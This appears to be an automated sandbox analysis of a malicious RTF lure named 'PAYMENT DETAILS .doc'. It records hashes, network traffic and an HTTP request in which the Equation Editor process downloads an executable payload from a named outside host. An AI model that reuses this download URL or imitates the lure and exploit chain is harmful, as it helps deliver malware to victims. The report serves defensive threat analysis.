SHA-256:	FFDC3B7A6AAC38998384C8B263BE3EB091EEC034ACCAA8DD668063AB96B11594
SHA-512:	81436E7669363A6120977394B6AE7DBED9A86FF9FAF8295E9A5468DF9CACD6FD99C129A590C0D2D7F431AE22675B6B26F143796CAD6D927997BE44BED2973CBF
Malicious:	false
Reputation:	low
Preview:	L..................F.... ....o.{...o.{......................................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....r.2.....IR.} .PAYMEN~1.DOC..V.......Q.y.Q.y...8.....................P.A.Y.M.E.N.T. .D.E.T.A.I.L.S. ...d.o.c.......~...............-...8...[............?J......C:\Users\..#...................\\216041\Users.user\Desktop\PAYMENT DETAILS .doc.+.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.P.A.Y.M.E.N.T. .D.E.T.A.I.L.S. ...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......216041..........D_....3N...W...9F.C....

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	86
Entropy (8bit):	4.405022824510587
Encrypted:	false
SSDEEP:	3:M1u8ogIltDIlmX1u8ogIlv:Ms8ogI/DI78ogI1
MD5:	47D59A00CE9042637DC5DE02CC1E3A01
SHA1:	AD94B748BCDA01F2C9A4B69D68A632FC7089DF42
SHA-256:	6AA999C5E08218C8DC5451B18D3790C22DE0C87D707790EF9F82A39D01DE8014
SHA-512:	8F658612B99C3C835283AC385E990E23E9AFC7AE31DDB29701B4D48C3A51002ECA512041D65E9B817D66713863EB87783A01CB8E9B2534679FB0592F42BC8AA5
Malicious:	false
Reputation:	low
Preview:	[doc]..PAYMENT DETAILS .LNK=0..PAYMENT DETAILS .LNK=0..[doc]..PAYMENT DETAILS .LNK=0..

C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.431160061181642
Encrypted:	false
SSDEEP:	3:vrJlaCkWtVy3KGcils6w7Adtln:vdsCkWthGciWfQl
MD5:	4A5DFFE330E8BBBF59615CB0C71B87BE
SHA1:	7B896C17F93ECFC9B69E84FC1EADEDD9DA550C4B
SHA-256:	D28616DC54FDEF1FF5C5BA05A77F178B7E3304493BAF3F4407409F2C84F4F215
SHA-512:	3AA160CB89F4D8393BCBF9FF4357FFE7AE00663F21F436D341FA4F5AD4AEDC737092985EB4A94A694A02780597C6375D1615908906A6CEC6D7AB616791B6285C
Malicious:	false
Reputation:	high, very likely benign file
Preview:	.user..................................................A.l.b.u.s.............p.......................................P.....................z...............x...

C:\Users\user\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lex Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	Little-endian UTF-16 Unicode text, with no line terminators
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:Qn:Qn
MD5:	F3B25701FE362EC84616A93A45CE9998
SHA1:	D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
SHA-256:	B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
SHA-512:	98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
Malicious:	false
Reputation:	high, very likely benign file
Preview:	..

C:\Users\user\Desktop\~$YMENT DETAILS .doc Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.431160061181642
Encrypted:	false
SSDEEP:	3:vrJlaCkWtVy3KGcils6w7Adtln:vdsCkWthGciWfQl
MD5:	4A5DFFE330E8BBBF59615CB0C71B87BE
SHA1:	7B896C17F93ECFC9B69E84FC1EADEDD9DA550C4B
SHA-256:	D28616DC54FDEF1FF5C5BA05A77F178B7E3304493BAF3F4407409F2C84F4F215
SHA-512:	3AA160CB89F4D8393BCBF9FF4357FFE7AE00663F21F436D341FA4F5AD4AEDC737092985EB4A94A694A02780597C6375D1615908906A6CEC6D7AB616791B6285C
Malicious:	false
Reputation:	high, very likely benign file
Preview:	.user..................................................A.l.b.u.s.............p.......................................P.....................z...............x...

Static File Info

General
File type:	Rich Text Format data, unknown version
Entropy (8bit):	4.010917595297492
TrID:	Rich Text Format (5005/1) 55.56% Rich Text Format (4004/1) 44.44%
File name:	PAYMENT DETAILS .doc
File size:	168836
MD5:	d87b7d6a8a6e8e14862a3b86b83c86fb
SHA1:	3bb19190fd9e216a4d9876252b51ad33a187b2b6
SHA256:	32c9e90e2cf72e2da62927932d952513ad1e6c1d2b0ba606a200e03cd06f9cc9
SHA512:	4785c54a03458842e91f592200b2ae4777d0f7c8ea6a5fcddcc8fc0b05a1761a5057465fc48c55c9924c3e8b9c8961e95367e5e5abc106b6a31a986a5c24844d
SSDEEP:	3072:J8xELv3SeudSS0Qg1mAOFktURIL1ql3P/L+yG5ze0LlKtnI+WAkGriDUkE:o8v3zud7jHFvK163nRQzFlsI/AbiDE
File Content Preview:	{\rtf3683{\object72052708 72052708\objautlink\objw3990\objh6995{\\objdata414877 {\\mboxPr75192644898urtf75192644898\\.75192644898 \\mboxPr75192644898urtf75192644898\*\.75192644898}

File Icon


Icon Hash:	e4eea2aaa4b4b4a4

Static RTF Info

Objects

Id	Start	Format ID	Format	Classname	Datasize	Filename	Sourcepath	Temppath	Exploit
0	0000005Bh	2	embedded	EQuation.3	84221				no

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 9, 2021 07:46:12.171452999 CET	49165	80	192.168.2.22	43.252.37.193
Feb 9, 2021 07:46:12.380253077 CET	80	49165	43.252.37.193	192.168.2.22
Feb 9, 2021 07:46:12.380403996 CET	49165	80	192.168.2.22	43.252.37.193
Feb 9, 2021 07:46:12.381040096 CET	49165	80	192.168.2.22	43.252.37.193
Feb 9, 2021 07:46:12.585450888 CET	80	49165	43.252.37.193	192.168.2.22
Feb 9, 2021 07:46:37.239435911 CET	80	49165	43.252.37.193	192.168.2.22
Feb 9, 2021 07:46:37.239515066 CET	49165	80	192.168.2.22	43.252.37.193
Feb 9, 2021 07:46:37.324956894 CET	49166	80	192.168.2.22	43.252.37.193
Feb 9, 2021 07:46:37.527159929 CET	80	49166	43.252.37.193	192.168.2.22
Feb 9, 2021 07:46:37.527264118 CET	49166	80	192.168.2.22	43.252.37.193
Feb 9, 2021 07:46:37.527726889 CET	49166	80	192.168.2.22	43.252.37.193
Feb 9, 2021 07:46:37.732261896 CET	80	49166	43.252.37.193	192.168.2.22
Feb 9, 2021 07:46:42.239546061 CET	80	49165	43.252.37.193	192.168.2.22
Feb 9, 2021 07:46:42.239633083 CET	49165	80	192.168.2.22	43.252.37.193
Feb 9, 2021 07:46:52.426546097 CET	80	49166	43.252.37.193	192.168.2.22
Feb 9, 2021 07:46:52.426578999 CET	80	49166	43.252.37.193	192.168.2.22
Feb 9, 2021 07:46:52.426595926 CET	80	49166	43.252.37.193	192.168.2.22
Feb 9, 2021 07:46:52.426614046 CET	80	49166	43.252.37.193	192.168.2.22
Feb 9, 2021 07:46:52.426629066 CET	80	49166	43.252.37.193	192.168.2.22
Feb 9, 2021 07:46:52.426645041 CET	80	49166	43.252.37.193	192.168.2.22
Feb 9, 2021 07:46:52.426668882 CET	80	49166	43.252.37.193	192.168.2.22
Feb 9, 2021 07:46:52.426690102 CET	80	49166	43.252.37.193	192.168.2.22
Feb 9, 2021 07:46:52.426726103 CET	80	49166	43.252.37.193	192.168.2.22
Feb 9, 2021 07:46:52.426749945 CET	80	49166	43.252.37.193	192.168.2.22
Feb 9, 2021 07:46:52.426851034 CET	49166	80	192.168.2.22	43.252.37.193
Feb 9, 2021 07:46:52.426903009 CET	49166	80	192.168.2.22	43.252.37.193
Feb 9, 2021 07:46:52.428728104 CET	49166	80	192.168.2.22	43.252.37.193
Feb 9, 2021 07:46:52.429028034 CET	49166	80	192.168.2.22	43.252.37.193
Feb 9, 2021 07:46:52.455574989 CET	49165	80	192.168.2.22	43.252.37.193
Feb 9, 2021 07:46:52.630702972 CET	80	49166	43.252.37.193	192.168.2.22
Feb 9, 2021 07:46:52.630744934 CET	80	49166	43.252.37.193	192.168.2.22
Feb 9, 2021 07:46:52.630786896 CET	80	49166	43.252.37.193	192.168.2.22
Feb 9, 2021 07:46:52.630820036 CET	80	49166	43.252.37.193	192.168.2.22
Feb 9, 2021 07:46:52.630883932 CET	49166	80	192.168.2.22	43.252.37.193
Feb 9, 2021 07:46:52.630914927 CET	49166	80	192.168.2.22	43.252.37.193
Feb 9, 2021 07:46:52.630918980 CET	49166	80	192.168.2.22	43.252.37.193
Feb 9, 2021 07:46:52.633660078 CET	49166	80	192.168.2.22	43.252.37.193

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 9, 2021 07:46:11.462927103 CET	52197	53	192.168.2.22	8.8.8.8
Feb 9, 2021 07:46:11.743365049 CET	53	52197	8.8.8.8	192.168.2.22
Feb 9, 2021 07:46:11.743745089 CET	52197	53	192.168.2.22	8.8.8.8
Feb 9, 2021 07:46:12.041249990 CET	53	52197	8.8.8.8	192.168.2.22
Feb 9, 2021 07:46:12.041635036 CET	52197	53	192.168.2.22	8.8.8.8
Feb 9, 2021 07:46:12.101022005 CET	53	52197	8.8.8.8	192.168.2.22
Feb 9, 2021 07:46:12.101339102 CET	52197	53	192.168.2.22	8.8.8.8
Feb 9, 2021 07:46:12.158613920 CET	53	52197	8.8.8.8	192.168.2.22
Feb 9, 2021 07:46:37.260756969 CET	53099	53	192.168.2.22	8.8.8.8
Feb 9, 2021 07:46:37.322938919 CET	53	53099	8.8.8.8	192.168.2.22

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Feb 9, 2021 07:46:11.462927103 CET	192.168.2.22	8.8.8.8	0x7e45	Standard query (0)	globalteamacademy.com	A (IP address)	IN (0x0001)
Feb 9, 2021 07:46:11.743745089 CET	192.168.2.22	8.8.8.8	0x7e45	Standard query (0)	globalteamacademy.com	A (IP address)	IN (0x0001)
Feb 9, 2021 07:46:12.041635036 CET	192.168.2.22	8.8.8.8	0x7e45	Standard query (0)	globalteamacademy.com	A (IP address)	IN (0x0001)
Feb 9, 2021 07:46:12.101339102 CET	192.168.2.22	8.8.8.8	0x7e45	Standard query (0)	globalteamacademy.com	A (IP address)	IN (0x0001)
Feb 9, 2021 07:46:37.260756969 CET	192.168.2.22	8.8.8.8	0xef41	Standard query (0)	www.globalteamacademy.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Feb 9, 2021 07:46:11.743365049 CET	8.8.8.8	192.168.2.22	0x7e45	No error (0)	globalteamacademy.com		43.252.37.193	A (IP address)	IN (0x0001)
Feb 9, 2021 07:46:12.041249990 CET	8.8.8.8	192.168.2.22	0x7e45	No error (0)	globalteamacademy.com		43.252.37.193	A (IP address)	IN (0x0001)
Feb 9, 2021 07:46:12.101022005 CET	8.8.8.8	192.168.2.22	0x7e45	No error (0)	globalteamacademy.com		43.252.37.193	A (IP address)	IN (0x0001)
Feb 9, 2021 07:46:12.158613920 CET	8.8.8.8	192.168.2.22	0x7e45	No error (0)	globalteamacademy.com		43.252.37.193	A (IP address)	IN (0x0001)
Feb 9, 2021 07:46:37.322938919 CET	8.8.8.8	192.168.2.22	0xef41	No error (0)	www.globalteamacademy.com	globalteamacademy.com		CNAME (Canonical name)	IN (0x0001)
Feb 9, 2021 07:46:37.322938919 CET	8.8.8.8	192.168.2.22	0xef41	No error (0)	globalteamacademy.com		43.252.37.193	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

globalteamacademy.com

www.globalteamacademy.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.22	49165	43.252.37.193	80	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Timestamp	kBytes transferred	Direction	Data
Feb 9, 2021 07:46:12.381040096 CET	1	OUT	GET /cafex/okb/upJIyDviCIIQ252.exe HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: globalteamacademy.com Connection: Keep-Alive
Feb 9, 2021 07:46:37.239435911 CET	1	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 09 Feb 2021 06:46:14 GMT Server: Apache Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Location: http://www.globalteamacademy.com/cafex/okb/upJIyDviCIIQ252.exe Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.22	49166	43.252.37.193	80	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Timestamp	kBytes transferred	Direction	Data
Feb 9, 2021 07:46:37.527726889 CET	2	OUT	GET /cafex/okb/upJIyDviCIIQ252.exe HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Connection: Keep-Alive Host: www.globalteamacademy.com
Feb 9, 2021 07:46:52.426546097 CET	4	IN	HTTP/1.1 404 Not Found Date: Tue, 09 Feb 2021 06:46:39 GMT Server: Apache Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://www.globalteamacademy.com/wp-json/>; rel="https://api.w.org/" Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 Data Raw: 31 32 39 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 3e 0a 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 20 2f 3e 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 69 6e 67 62 61 63 6b 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 67 6c 6f 62 61 6c 74 65 61 6d 61 63 61 64 65 6d 79 2e 63 6f 6d 2f 78 6d 6c 72 70 63 2e 70 68 70 22 20 2f 3e 0a 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 47 6c 6f 62 61 6c 20 54 65 61 6d 20 41 63 61 64 65 6d 79 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 73 2e 77 2e 6f 72 67 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 47 6c 6f 62 61 6c 20 54 65 61 6d 20 41 63 61 64 65 6d 79 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 67 6c 6f 62 61 6c 74 65 61 6d 61 63 61 64 65 6d 79 2e 63 6f 6d 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 47 6c 6f 62 61 6c 20 54 65 61 6d 20 41 63 61 64 65 6d 79 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 67 6c 6f 62 61 6c 74 65 61 6d 61 63 61 64 65 6d 79 2e 63 6f 6d 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 09 09 09 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 32 2e 32 2e 31 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 Data Ascii: 1291<!DOCTYPE html><html lang="en-US" class="no-js"><head><meta charset="UTF-8" /><meta content="width=device-width, initial-scale=1.0, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no" name="viewport"><link rel="profile" href="http://gmpg.org/xfn/11" /><link rel="pingback" href="http://www.globalteamacademy.com/xmlrpc.php" /><title>Page not found – Global Team Academy</title><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel='dns-prefetch' href='//s.w.org' /><link rel="alternate" type="application/rss+xml" title="Global Team Academy » Feed" href="http://www.globalteamacademy.com/feed/" /><link rel="alternate" type="application/rss+xml" title="Global Team Academy » Comments Feed" href="http://www.globalteamacademy.com/comments/feed/" /><script type="text/javascript">window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/2.2.1\/72x72\/","ext":".png","svgUrl"
Feb 9, 2021 07:46:52.426578999 CET	5	IN	Data Raw: 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 32 2e 32 2e 31 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b Data Ascii: :"https:\/\/s.w.org\/images\/core\/emoji\/2.2.1\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/www.globalteamacademy.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=4.7.19"}};!function(a,b,c){function d(a){var b,c,d,e,f=String
Feb 9, 2021 07:46:52.426595926 CET	6	IN	Data Raw: 74 73 2e 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 26 26 63 2e 73 75 70 70 6f 72 74 73 5b 69 5b 68 5d 5d 29 3b 63 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 3d 63 2e 73 75 70 70 6f Data Ascii: ts.everythingExceptFlag&&c.supports[i[h]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything\|\|(g=function(){c.readyCallback()},b.addE
Feb 9, 2021 07:46:52.426614046 CET	7	IN	Data Raw: 2d 66 6f 72 6d 2d 37 2d 63 73 73 27 20 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 77 77 77 2e 67 6c 6f 62 61 6c 74 65 61 6d 61 63 61 64 65 6d 79 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 63 6f 6e 74 61 63 74 2d 66 6f Data Ascii: -form-7-css' href='http://www.globalteamacademy.com/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.0.2' type='text/css' media='all' /><link rel='stylesheet' id='rs-plugin-settings-css' href='http://www.globalteamacademy.com
Feb 9, 2021 07:46:52.426629066 CET	9	IN	Data Raw: 32 30 30 30 0d 0a 3c 73 74 79 6c 65 20 69 64 3d 27 74 68 65 6d 65 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0a 62 6f 64 79 20 7b 20 20 63 6f 6c 6f 72 3a 20 23 33 44 33 32 34 32 3b 20 20 66 6f 6e 74 2d Data Ascii: 2000<style id='theme-inline-css' type='text/css'>body { color: #3D3242; font-size: 15px; font-family: Hind Siliguri; font-weight: 0; font-style: normal; } h1, h2, h3, h4, h5, h6 { font-family: Hind Vadodara; font-weight: 700; font-s
Feb 9, 2021 07:46:52.426645041 CET	10	IN	Data Raw: 63 5f 72 6f 77 5f 77 72 61 70 2c 2e 70 61 67 65 2d 66 75 6c 6c 77 69 64 74 68 20 23 70 61 67 65 2d 62 6f 64 79 20 23 72 65 73 70 6f 6e 64 2c 2e 70 61 67 65 2d 66 75 6c 6c 77 69 64 74 68 20 23 70 61 67 65 2d 62 6f 64 79 20 2e 6e 6f 63 6f 6d 6d 65 Data Ascii: c_row_wrap,.page-fullwidth #page-body #respond,.page-fullwidth #page-body .nocomments { width: 1110px; } body.layout-boxed #site-wrapper,body.layout-boxed #site-wrapper #masthead-sticky,body.layout-boxed #site-wrapper #masthead.header-v7 { w
Feb 9, 2021 07:46:52.426668882 CET	12	IN	Data Raw: 75 74 5b 74 79 70 65 3d 22 65 6d 61 69 6c 22 5d 3a 66 6f 63 75 73 2c 20 0a 69 6e 70 75 74 5b 74 79 70 65 3d 22 75 72 6c 22 5d 3a 66 6f 63 75 73 2c 20 0a 69 6e 70 75 74 5b 74 79 70 65 3d 22 73 65 61 72 63 68 22 5d 3a 66 6f 63 75 73 2c 20 0a 69 6e Data Ascii: ut[type="email"]:focus, input[type="url"]:focus, input[type="search"]:focus, input[type="tel"]:focus, input[type="color"]:focus,input.input-text:focus,select:focus,#site-wrapper .vc_tta-accordion .vc_tta-panel-heading .vc_tta-panel-titl
Feb 9, 2021 07:46:52.426690102 CET	13	IN	Data Raw: 20 2e 62 6c 6f 67 2d 73 68 6f 72 74 63 6f 64 65 2e 62 6c 6f 67 2d 67 72 69 64 20 2e 68 65 6e 74 72 79 20 2e 65 6e 74 72 79 2d 63 6f 76 65 72 20 2e 65 6e 74 72 79 2d 74 69 6d 65 2c 0a 2e 62 6c 6f 67 20 2e 68 65 6e 74 72 79 20 2e 65 6e 74 72 79 2d Data Ascii: .blog-shortcode.blog-grid .hentry .entry-cover .entry-time,.blog .hentry .entry-content .readmore .more-link:hover,#site-footer,#site-wrapper .testimonial .testimonial-image::after,.blog .hentry.sticky,.single-post .hentry .entry-footer
Feb 9, 2021 07:46:52.426726103 CET	14	IN	Data Raw: 20 6c 69 20 2e 61 64 64 5f 74 6f 5f 63 61 72 74 5f 62 75 74 74 6f 6e 2c 20 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 70 61 67 65 20 2e 70 72 6f 64 75 63 74 73 20 6c 69 20 2e 61 64 64 5f 74 6f 5f 63 61 72 74 5f 62 75 74 74 6f 6e 2c 0a 2e 77 69 64 67 Data Ascii: li .add_to_cart_button, .woocommerce-page .products li .add_to_cart_button,.widget.widget_product_tag_cloud .tagcloud a,.widget_shopping_cart .buttons .button.checkout, .widget_shopping_cart_content .buttons .button.checkout,.widget.widget
Feb 9, 2021 07:46:52.426749945 CET	16	IN	Data Raw: 2c 20 68 35 20 69 2c 20 68 36 20 69 2c 0a 2e 6e 61 76 69 67 61 74 69 6f 6e 2e 70 6f 73 74 2d 6e 61 76 69 67 61 74 69 6f 6e 20 2e 6e 61 76 2d 6c 69 6e 6b 73 20 6c 69 20 61 20 73 70 61 6e 2c 0a 2e 77 69 64 67 65 74 2e 77 69 64 67 65 74 5f 72 65 63 Data Ascii: , h5 i, h6 i,.navigation.post-navigation .nav-links li a span,.widget.widget_recent_comments ul li::after,.header-v4 #site-header #masthead #site-brand .wrapper .header-widgets .widget .info-icon i,.projects.projects-grid .projects-items .
Feb 9, 2021 07:46:52.630702972 CET	17	IN	Data Raw: 63 68 65 6d 65 32 3a 68 6f 76 65 72 2c 20 0a 62 75 74 74 6f 6e 5b 74 79 70 65 3d 22 73 75 62 6d 69 74 22 5d 2e 73 63 68 65 6d 65 32 3a 68 6f 76 65 72 2c 0a 2e 62 75 74 74 6f 6e 2e 73 63 68 65 6d 65 32 3a 68 6f 76 65 72 2c 0a 2e 62 67 2d 73 63 68 Data Ascii: cheme2:hover, button[type="submit"].scheme2:hover,.button.scheme2:hover,.bg-scheme2,#site-header #headerbar .top-navigator .menu li .sub-menu li a::before,#site-head1218er #masthead #site-navigator .menu li .sub-menu li a::before,#si

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: WINWORD.EXE PID: 2304 Parent PID: 584

General

Start time:	07:45:37
Start date:	09/02/2021
Path:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Imagebase:	0x13f9e0000
File size:	1424032 bytes
MD5 hash:	95C38D04597050285A18F66039EDB456
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: EQNEDT32.EXE PID: 1976 Parent PID: 584

General

Start time:	07:45:38
Start date:	09/02/2021
Path:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Wow64 process (32bit):	true
Commandline:	'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Imagebase:	0x400000
File size:	543304 bytes
MD5 hash:	A87236E214F6D42A65F5DEDAC816AEC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Reset < >

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
